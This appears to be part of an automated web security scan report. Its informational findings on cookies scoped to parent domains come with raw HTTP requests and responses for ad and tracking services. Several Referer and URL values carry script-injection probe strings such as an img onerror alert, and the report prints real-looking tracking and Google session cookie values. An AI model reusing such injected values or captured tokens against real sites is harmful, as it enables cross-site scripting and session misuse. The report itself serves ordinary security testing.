Set-Cookie: mc=4d4b26d3-59834-71bae-edc2f; expires=Thu, 03-Feb-2021 22:06:11 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV"
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Fri, 04 Feb 2011 22:06:11 GMT
Content-Length: 5265
Date: Thu, 03 Feb 2011 22:06:11 GMT
Server: QS

if(!__qc){var __qc={qcdst:function(){if(__qc.qctzoff(0)!=__qc.qctzoff(6))return 1;return 0;},qctzoff:function(m){var d1=new Date(2000,m,1,0,0,0,0);var t=d1.toGMTString();var d3=new Date(t.substring(0,
...[SNIP]...

12.54. http://forums.digitalpoint.com/showthread.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.digitalpoint.com
Path:   /showthread.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /showthread.php?t\\x3d1355583\\x22 HTTP/1.1
Host: forums.digitalpoint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:32:20 GMT
Server: Apache
Set-Cookie: bb_lastvisit=1296765140; expires=Fri, 03-Feb-2012 20:32:20 GMT; path=/; domain=.digitalpoint.com
Set-Cookie: bb_lastactivity=0; expires=Fri, 03-Feb-2012 20:32:20 GMT; path=/; domain=.digitalpoint.com
Set-Cookie: dyk=1; expires=Thu, 10-Feb-2011 20:32:20 GMT; path=/; domain=.digitalpoint.com
Cache-Control: private
Pragma: private
Content-Length: 24249
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...

12.55. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pagead/ads?client=ca-pub-3033999741136561&output=html&h=60&slotname=2067036752&w=468&lmt=1296787016&flash=0&url=http%3A%2F%2Fwww.bizfind.us%2F15%2F182221%2Fabc-development-inc%2Fchicago.aspx%2Fx22%2F%2522ns%3D%2522alert(0x0006C1)&dt=1296787016748&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=7707606529&correlator=1296787013038&frm=0&adk=2139689042&ga_vid=1487308896.1296787013&ga_sid=1296787013&ga_hid=720933573&ga_fc=1&u_tz=-360&u_his=0&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=0&u_nmime=0&biw=1172&bih=684&eid=30143103&fu=0&ifi=2&dtd=12&xpc=YHKwpL9Wg6&p=http%3A//www.bizfind.us HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1)
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: googleads.g.doubleclick.net
Proxy-Connection: Keep-Alive
Cookie: test_cookie=CheckForPermission

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Set-Cookie: id=2299c2bdf900002f||t=1296786962|et=730|cs=ziqtnqpy; expires=Sun, 03-Feb-2013 02:36:02 GMT; path=/; domain=.doubleclick.net
Set-Cookie: test_cookie=; domain=.doubleclick.net; path=/; Max-Age=0; expires=Mon, 21-July-2008 23:59:00 GMT
X-Content-Type-Options: nosniff
Date: Fri, 04 Feb 2011 02:36:02 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Expires: Fri, 04 Feb 2011 02:36:02 GMT
Content-Length: 5976

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#993400;cursor:hand;}body,table,div,ul,li{font-size
...[SNIP]...

12.56. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pagead/ads?client=ca-pub-3033999741136561&output=html&h=90&slotname=7707606529&w=728&lmt=1296787013&flash=0&url=http%3A%2F%2Fwww.bizfind.us%2F15%2F182221%2Fabc-development-inc%2Fchicago.aspx%2Fx22%2F%2522ns%3D%2522alert(0x0006C1)&dt=1296787012997&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296787013038&frm=0&adk=1367998553&ga_vid=1487308896.1296787013&ga_sid=1296787013&ga_hid=720933573&ga_fc=1&u_tz=-360&u_his=0&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=0&u_nmime=0&biw=1172&bih=684&eid=30143103&fu=0&ifi=1&dtd=145&xpc=LTjYuEf78i&p=http%3A//www.bizfind.us HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1)
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: googleads.g.doubleclick.net
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Set-Cookie: test_cookie=CheckForPermission; expires=Fri, 04-Feb-2011 02:50:59 GMT; path=/; domain=.doubleclick.net
X-Content-Type-Options: nosniff
Date: Fri, 04 Feb 2011 02:35:59 GMT
Server: cafe
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block
Expires: Fri, 04 Feb 2011 02:35:59 GMT
Content-Length: 4758

<html><head><style><!--
a:link { color: #ffffff }a:visited { color: #ffffff }a:hover { color: #ffffff }a:active { color: #ffffff } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...

12.57. http://groups.google.com/grphp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://groups.google.com
Path:   /grphp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /grphp HTTP/1.1
Host: groups.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=a882ba2c85085b39:TM=1296765185:LM=1296765185:S=gXivMzaMSKmp3KUf; expires=Sat, 02-Feb-2013 20:33:05 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Thu, 03 Feb 2011 20:33:05 GMT
Server: GWS-GRFE/0.50
X-XSS-Protection: 1; mode=block
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html >
<head>
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...

12.58. http://hit.clickaider.com/clickaider.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hit.clickaider.com
Path:   /clickaider.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /clickaider.js HTTP/1.1
Host: hit.clickaider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=4d3f2276-241363738113; clickdata=eNptzDsOwjAQhOG7bA9%2BINt49jQO3ogUkGjtBkW5Ow415f%2BNNAUOe4OzoDzH5Gy8XwJxQTg5gZq0KrIRL3Dc4EG9%2FcLnmKJPPg%2B9gZb%2FrDITT7CjAkjeXT903ozp2fsGY6a1aFUpVfT6WF%2BG%2BDi%2B%2FiwqyA%3D%3D; vid=3e136b53-42127475201;

Response

HTTP/1.1 200 OK
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA"
Expires: Fri, 04 Feb 2011 20:32:22 GMT
Cache-Control: private, max-age=86400
Set-Cookie: vid=3e136b53-42127475201; Path=/; Version=1; Domain=.clickaider.com; Expires=Fri, 03 Feb 2012 20:32:22 GMT
Content-Type: application/x-javascript
Content-Length: 9501
Date: Thu, 03 Feb 2011 20:32:22 GMT
Server: lighttpd/1.4.18

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e)
...[SNIP]...

12.59. http://hit.clickaider.com/pv  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hit.clickaider.com
Path:   /pv

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pv?lng=156&&lnks=&t=Boardreader%20-%20Forum%20Search%20Engine&c=9f671068-5&r=&tz=-360&var1=main%20page&var3=general%20user&loc=http%3A%2F%2Fboardreader.com%2F&rnd=5831 HTTP/1.1
Host: hit.clickaider.com
Proxy-Connection: keep-alive
Referer: http://boardreader.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vid=3e136b53-42127475201

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.1.6
P3P: policyref="/w3c/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA"
Set-Cookie: clickdata=eNptzDsOwjAQhOG7bA9%2BINt49jQO3ogUkGjtBkW5Ow415f%2BNNAUOe4OzoDzH5Gy8XwJxQTg5gZq0KrIRL3Dc4EG9%2FcLnmKJPPg%2B9gZb%2FrDITT7CjAkjeXT903ozp2fsGY6a1aFUpVfT6WF%2BG%2BDi%2B%2FiwqyA%3D%3D; path=/; domain=.clickaider.com
Set-Cookie: sid=4d3f2276-241363738113; path=/; domain=.clickaider.com
Cache-Control: no-cache, private, proxy-revalidate, max-age=86400
Pragma: no-cache
Content-Type: image/gif
Content-Length: 43
Date: Thu, 03 Feb 2011 19:52:09 GMT
Server: lighttpd/1.4.18

GIF89a.............!.......,...........D..;

12.60. http://id.google.com/verify/EAAAACH56svoxGh0pQKQS_SWJUw.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAACH56svoxGh0pQKQS_SWJUw.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAACH56svoxGh0pQKQS_SWJUw.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1)
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=43=1x_JRAnhVh0aezZvVbButQc6VLCkeQ4CCDimZx9OaQ=6FvUugeFs7hoYGaI; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69

Response

HTTP/1.1 200 OK
Set-Cookie: NID=43=QsrX1d1-hFt0YLGE7iEekvD4pKs3byVHeGLOuqpMM9fCiVznMJJnbJi_aM0dBQGXOjxZ8gR0vu0BeidKCiq8NBx8GATXqT0Zrcp4Bh9MrZ5PUGjME1dB5WT5lit0cEFn; expires=Sat, 06-Aug-2011 02:36:11 GMT; path=/; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Fri, 04 Feb 2011 02:36:11 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

12.61. http://id.google.com/verify/EAAAADYWfsu5HsvuyGjqK9465xg.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAADYWfsu5HsvuyGjqK9465xg.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAADYWfsu5HsvuyGjqK9465xg.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Abc+Development
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=43=w_Qdc_R1bbRlDs-dYzZ1XxBBP7Rr8d8PCxLqZ6cCRg=FM5tsiHXMmG0LJWl; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=43=MInFyyM8yCTUzGr8cP7TNrs0RJ5g93nqipFbcotH9w=SFQpwHyDfkoyN23H; expires=Fri, 05-Aug-2011 19:54:47 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Thu, 03 Feb 2011 19:54:47 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

12.62. http://id.google.com/verify/EAAAAIVT7-vGYB4446LYcy48YVM.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://id.google.com
Path:   /verify/EAAAAIVT7-vGYB4446LYcy48YVM.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAIVT7-vGYB4446LYcy48YVM.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=43=MInFyyM8yCTUzGr8cP7TNrs0RJ5g93nqipFbcotH9w=SFQpwHyDfkoyN23H; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=43=1x_JRAnhVh0aezZvVbButQc6VLCkeQ4CCDimZx9OaQ=6FvUugeFs7hoYGaI; expires=Sat, 06-Aug-2011 02:33:58 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Fri, 04 Feb 2011 02:33:58 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

12.63. http://l0.scanscout.com/ssframework/log/log.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://l0.scanscout.com
Path:   /ssframework/log/log.png

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ssframework/log/log.png?a=logitemaction&CbC=1&CbF=true&EC=3&RC=3&SmC=2&AmN=1&CbM=b25%2F1&admode=preroll&VI=33687174&PRI=1386067554&VC=0&Uzip=N%2FA&RvN=1&RprC=0&ADsn=1&VcaI=96%2C192%2C200&RrC=0&VgI=26d91cdf5493d1dd943311e83ddb679d&SfF=true&AVI=57872&Ust=dc&Uctry=us&AC=4&CI=1426141&PI=626&CC=0&Udma=511&ADI=5945246&VmC=0&VscaI=96&VclF=true&PC=1 HTTP/1.1
Host: l0.scanscout.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: userCookie=4673e32b6fda399c64d2cb48d3800e10; uniques=110203|626_110203; psh=626_1296767254411; behavioralSegments=29_110203|32_110203

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:07:37 GMT
Server: Apache
p3p: policyref=/w3c/p3p.xml
Set-Cookie: networkInfo=57872|110203_160737|626|33687174|null|5945246|1426141|1|14.0|true|4|true|us|V|0; Domain=.scanscout.com; Expires=Fri, 03-Feb-2012 21:07:37 GMT; Path=/
Set-Cookie: streamHistory=delete; Domain=.scanscout.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: campUnique=1426141; Domain=.scanscout.com; Expires=Fri, 03-Feb-2012 21:07:37 GMT; Path=/
Set-Cookie: sssrvyhst2=110203_1426141; Domain=.scanscout.com; Expires=Fri, 03-Feb-2012 21:07:37 GMT; Path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 101
Connection: close
Content-Type: image/png

.PNG
.
...IHDR.....................sRGB.........bKGD.............IDAT..c````......^.*:....IEND.B`.

12.64. http://l0.scanscout.com/ssframework/logController.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://l0.scanscout.com
Path:   /ssframework/logController.xml

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /ssframework/logController.xml HTTP/1.1
Host: l0.scanscout.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038
content-type: application/x-www-form-urlencoded
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: userCookie=4673e32b6fda399c64d2cb48d3800e10; uniques=110203|626_110203; psh=626_1296767254411; networkInfo=57872|110203_160737|626|33687174|null|5945246|1426141|1|14.0|true|4|true|us|V|0; campUnique=1426141; sssrvyhst2=110203_1426141; osh=626_1296767643681; behavioralSegments=29_110203_2|32_110203_2|263_110203
Content-Length: 617

Srpc=yahoo%5Ftag%3Ascanscout%5Fus%5Fctxt%3B&Ucty=washington&a=logitemaction&VI=33687174&RmT=0&PC=0&RwT=5&ADst=B&Uctry=us&PmC=2&UareV=5%2E11%2E0%2E01&ADI=5933178&RovC=0&RrC=2&PI=626&RC=2&RvN=1&CbC=1&PR
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:14:09 GMT
Server: Apache
p3p: policyref=/w3c/p3p.xml
Set-Cookie: networkInfo=57058|110203_161409|626|33687174|null|5933178|1414196|1|12.0|true|1|true|us|V|717380|2||57872|110203_160737|626|33687174|null|5945246|1426141|1|14.0|true|4|true|us|V; Domain=.scanscout.com; Expires=Fri, 03-Feb-2012 21:14:09 GMT; Path=/
Set-Cookie: streamHistory=delete; Domain=.scanscout.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: campUnique=1414196_1426141; Domain=.scanscout.com; Expires=Fri, 03-Feb-2012 21:14:09 GMT; Path=/
Set-Cookie: sssrvyhst2=110203_1414196|110203_1426141; Domain=.scanscout.com; Expires=Fri, 03-Feb-2012 21:14:09 GMT; Path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=EC2ECA527A6D86A1BF90D5DB051B04A3; Path=/ssframework
Content-Language: en-US
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 2

0

12.65. http://livechat.boldchat.com/aid/3760177095415339810/bc.chat  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://livechat.boldchat.com
Path:   /aid/3760177095415339810/bc.chat

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /aid/3760177095415339810/bc.chat?cwdid=1954365562430760092&wdid=798708614246318013&rdid=1201083812220968228&vr=&vn=&vi=&ve=&vp=&iq=&curl= HTTP/1.1
Host: livechat.boldchat.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Resin/2.1.17
Cache-Control: no-cache,no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM", policyref="http://my.boldchat.com/w3c/p3p.xml"
Set-Cookie: bc-visitor-id=798708614246318013=948822557773872607; domain=.boldchat.com; path=/; expires=Fri, 03-Feb-2012 19:47:54 GMT
Set-Cookie: bc-visit-id=798708614246318013=9223372036839677808; domain=.boldchat.com; path=/
Set-Cookie: JSESSIONID=a_SsnwztJaxd; path=/
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 19:47:53 GMT
Content-Length: 11752


   <html>
<head>
<HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE" />
<!-- Overridable STYLE -->
<STYLE><!--
.print_cell, .email_cell {
   padding: 4px;
}
.email_prompt_box {
...[SNIP]...

12.66. https://livechat.boldchat.com/aid/3760177095415339810/bc.chat  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://livechat.boldchat.com
Path:   /aid/3760177095415339810/bc.chat

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /aid/3760177095415339810/bc.chat HTTP/1.1
Host: livechat.boldchat.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Resin/2.1.17
Cache-Control: no-cache,no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM", policyref="http://my.boldchat.com/w3c/p3p.xml"
Set-Cookie: bc-visitor-id=3760177095415339810=7851714395809697412; domain=.boldchat.com; path=/; expires=Fri, 03-Feb-2012 20:32:21 GMT
Set-Cookie: bc-visit-id=3760177095415339810=9223372036839688863; domain=.boldchat.com; path=/
Set-Cookie: JSESSIONID=aP-3JlTQvoC6; path=/
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 20:32:21 GMT
Content-Length: 101191


   <html>
<head>
<HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE" />
<!-- Overridable STYLE -->
<STYLE><!--
.print_cell, .email_cell {
   padding: 4px;
}
.email_prompt_box {
...[SNIP]...

12.67. http://load.exelator.com/load/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://load.exelator.com
Path:   /load/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /load/?p=200&g=512 HTTP/1.1
Host: load.exelator.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: EVX=eJyNyjsOgCAQRdG9sIL5ZuCxmAkltaVh76KWNuZWNzkDinNCqmu0PsD3UT%252FAFYWtekaKeRJx7kpfE0oS4T9xkyDnL24P1hdb6sbrAgq5JDk%253D; xltl=eJxLtDKyqi62MrZSCvV0UbIGsoyslEwSE02STSwtzRPNU03MkiwsktMMUpItzCzSkgwtTFMNwOqslHyCnJWsM60MTSxNDcxNLaxrASUcFEk%253D; myPAL=eJylkj1PwzAQhv9LvHq4O387U2iEVIlEUALqytiZkfLfubPrtEVVB5iSOM89Pr%252Fnj4w2fx0y9J%252BZQu7Q%252BqRSSqgQrAIPauGXiVeo6w8ZBfOCBXfCAigAZCxAo2iVrdQtmWHMFll0iqIzIWkDFLiIrCvW4WHR2%252Fld76a93jxNehj3UmnXDWK4s4E7Y%252FECixVbGuYZw3iJEYCy0Sv5G25KEKrkrUmiYFXSAgyGz0DqlcBy30dA4RJzvuhSycbqRAEcagICJx8GfX1wDKbGMA589vFlXvS4nR%252B1pMJplIHI4Lz%252Fk09ULdxTsIj%252F0w3Ps6i4w13RyU2w%252BEt3z1CqysUw5yq8rqq9XI%252B8679%252FANW9nC8%253D; 